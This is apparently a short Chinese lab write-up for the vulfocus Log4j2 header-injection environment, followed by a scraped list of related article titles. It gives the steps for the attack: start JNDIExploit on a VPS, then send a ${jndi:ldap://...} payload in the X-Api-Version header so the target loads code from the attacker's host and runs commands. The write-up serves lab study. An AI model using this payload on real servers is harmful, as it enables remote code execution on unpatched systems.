vulfocus:log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段

1、首先准备一个vps环境(腾讯云阿里云都可)

在vps上开启ldap环境:(Log4j2-Exp工具在github上自行下载)

输入命令开启监听:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i  你的vps的IP地址 -l 7000 -p 5000

 2、bp抓包伺候

构造payload:payload=${jndi:ldap://你vps地址:7000/TomcatBypass/TomcatEcho}

获取flag获取cmd:ls /tmp

注意查看自己的监听端口:是有数据回显的

Log4j2远程命令执行2-vulfocus-wp相关推荐

  1. Log4j2远程命令执行(CVE-2021-44228)复现

    漏洞说明 Log4j是Apache的开源日志记录组件.Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性.该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息. 由 ...

  2. vulfocus复现:Log4j2远程命令执行2

    1.开启靶机环境并访问 2.使用JNDIExploit.v1.2在自己的vps上开启服务 工具下载: 链接:https://pan.baidu.com/s/1oCfHPw-mMBPDDjNy-RO1Y ...

  3. 快速修复 Log4j2 远程代码执行漏洞步骤

    点击关注公众号,实用技术文章及时了解 来源:blog.csdn.net/weixin_48990070/ article/details/121861553 目录 漏洞说明 修复步骤 下载源码zip包 ...

  4. log4j2远程代码执行漏洞学习总结

    log4j2远程代码执行漏洞学习总结 背景 近期log4j2的漏洞闹得沸沸扬扬,在工作之余也是找了一些资料看一下相关的内容,到现在网上的总结已经很全了,B站上有各种漏洞复现,各大博客类网站关于JNDI ...

  5. GoAhead远程命令执行漏洞(CVE-2021-42342)

    GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...

  6. Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)

    今天 Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)的问题代码,如图: 随即在国内安全圈炸开了锅,大家纷纷转发一张图: 上次因为核弹级漏洞 log4j2 的 POC 公开,大批企业为 ...

  7. 代码审计-dubbo admin =2.6.1远程命令执行漏洞

    前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...

  8. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

  9. exim远程命令执行漏洞分析(cve-2019-10149)

    0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...

最新文章

  1. 人工智能中图神经网络GNN是什么?
  2. AI 与区块链:两大热门技术,会碰撞出什么样的火花?
  3. Day3-python基础3
  4. 管理费用负数报不了怎么办_我的心脏血管堵了很久,大夫说打不开了,我可怎么办?...
  5. 深入浅出VC++串口编程之基于Win32 API
  6. HTML5的应用缓存
  7. vue实例中使用swiper
  8. 第一届对象存储技术及应用大会:Esri中国周宁——万物互联时代,云存储技术的变革与展望...
  9. ASPCMS插件,批量ASPCMS采集发布插件
  10. xmind思维导图pdf格式如何导出?xmind思维导图pdf格式导出流程介绍
  11. 法国物联网公司Sigfox 获1.6亿美元E轮融资
  12. 什么是单工,半双工,全双工
  13. 咸鱼ZTMS实例—心率检测
  14. AGV搬运机器人「眼睛」的未来:3D视觉导航方案
  15. 【NVMe2.0b 16-1】Get Log Page
  16. 恢复视力方法(仅供参考)
  17. 为什么网页打不开?QQ可以上网页打不开的解决办法
  18. 软件测试--两个星期的工作经历
  19. 如何用python写一个接口
  20. Oracle Primavera P6系列

热门文章

  1. dw连接mysql数据库原理_Dreamweaver中连接SQL Server数据库代码
  2. mac安装Texpad:提示无法打开,因为APPLE无法检查其是否包含恶意软件解决方案
  3. 微商截图王app 好用的截图工具
  4. 窥探现代浏览器架构(二)
  5. 【愚公系列】2023年02月 WMS智能仓储系统-001.NLog日志的使用
  6. Zigbee efr32 有线网关接入HASS中的ZHA,实现设备控制
  7. 计算机录制语音所必需的硬件,录音电脑配置方面的硬件要求
  8. 社会:中国成单身大国 超36%单身女性选择不婚
  9. 免费工具iFRPFILE All in One 2.7.1免费工具
  10. 关键词提取(三种免费工具)